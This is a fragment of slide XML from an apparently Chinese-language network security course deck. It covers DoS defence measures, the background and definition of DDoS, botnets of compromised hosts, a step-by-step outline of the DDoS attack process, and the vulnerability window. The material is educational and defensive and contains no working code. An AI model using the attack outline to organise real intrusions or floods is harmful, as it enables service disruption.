            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>入侵检测系统，检测异常行为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对于系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>升级系统内核，打上必要的补丁，特别是一些简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>land</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>teardrop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>smurf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>关掉不必要的服务和网络组件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果有配额功能的话，正确地设置这些配额</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>监视系统的运行，避免降低到基线以下</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>检测系统配置信息的变化情况</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>保证物理安全</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>建立备份和恢复机制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290818" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>防御策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E522E10-2696-4A1F-B96A-4DC3F5ACAB71}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>177</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3275550577"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击一对一方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>早期效果明显：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>随着攻击目标抗击打能力提升（对恶意攻击包“消化能力”加强），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击的困难程度加大：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>计算机处理能力增长，内存增加，千兆级别网络，，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如攻击软件每秒发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3,000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>个攻击包，目标主机与网络带宽每秒可处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>10,000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>个攻击包，这样一来攻击就不会产生什么效果。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3074" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>产生的背景</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178</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2991816140"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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入侵并控制若干存在安全漏洞的计算机（作为傀儡或肉鸡）联合起来作为攻击平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>僵尸网络</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>借助客户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过主控程序与代理程序通讯，发送攻击指令，操纵傀儡主机同时对一个或多个目标发动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主控程序能在几秒钟内激活成百上千个代理程序的运行。成倍地提高拒绝服务攻击的威力。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>定义</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179</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2458163354"/>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rmAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息系统普遍存在安全漏洞，各个部分都存在，为攻击者攻击系统打开方便之门</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>硬件：设备、组件、媒体</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件：操作系统、应用系统、数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络：设备、协议、系统</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>策略、人员：懈怠</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞生命周期：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统（应用）发布——漏洞暴露——发布补丁——安装补丁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>新漏洞暴漏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>新补丁发布</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>攻击窗口：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞暴露</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>安装补丁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>攻击窗口越短，越安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18434" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>时间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞窗口 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3C1E9910-C34A-4D29-A356-A97C78BB4C13}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>两个步骤：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>发展团队</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻占代理主机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>协同攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向目标发起攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>具体步骤：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>探测扫描大量主机以寻找可入侵主机；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入侵有安全漏洞的主机并获取控制权；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装攻击所用的客户进程或守护进程；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>向客户进程发出命令，操纵代理主机进行协同入侵。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4098" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击过程</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180</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4253243955"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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1150938" y="617538"/>
            <a:ext cx="7793037" cy="755650"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600"/>
              <a:t>分布式拒绝服务攻击(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600"/>
              <a:t>DDoS)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030"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AE7E26C8-B319-47C5-B7A9-EB9127DAEB48}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>181</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1026" name="Object 0"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4267200" y="2286000"/>
          <a:ext cx="474663" cy="520700"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s667882" name="Photo Editor Photo" r:id="rId4" imgW="952633" imgH="1047619" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId4" imgW="952633" imgH="1047619" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture 8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860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
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5181600" y="2971800"/>
          <a:ext cx="474663" cy="522288"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s667883" name="Photo Editor Photo" r:id="rId6" imgW="952633" imgH="1047619" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId6" imgW="952633" imgH="1047619" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture 8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9718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2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4267200" y="4953000"/>
          <a:ext cx="471488" cy="519113"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s667884" name="Photo Editor Photo" r:id="rId7" imgW="952633" imgH="1047619" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId7" imgW="952633" imgH="1047619" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture 8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9530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3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5181600" y="4191000"/>
          <a:ext cx="479425" cy="527050"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s667885" name="Photo Editor Photo" r:id="rId8" imgW="952633" imgH="1047619" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Photo Editor Photo" r:id="rId8" imgW="952633" imgH="1047619" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture 8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1910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PPBand272"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="4572000"/>
            <a:ext cx="1066800" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻击者</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033" name="PPBand273"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="3505200"/>
            <a:ext cx="1347788" cy="261938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>各种客户主机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1034" name="Picture 9" descr="desktoppc"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="3352800"/>
            <a:ext cx="692150" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1035" name="PPBand274"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="4191000"/>
            <a:ext cx="1143000" cy="287338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
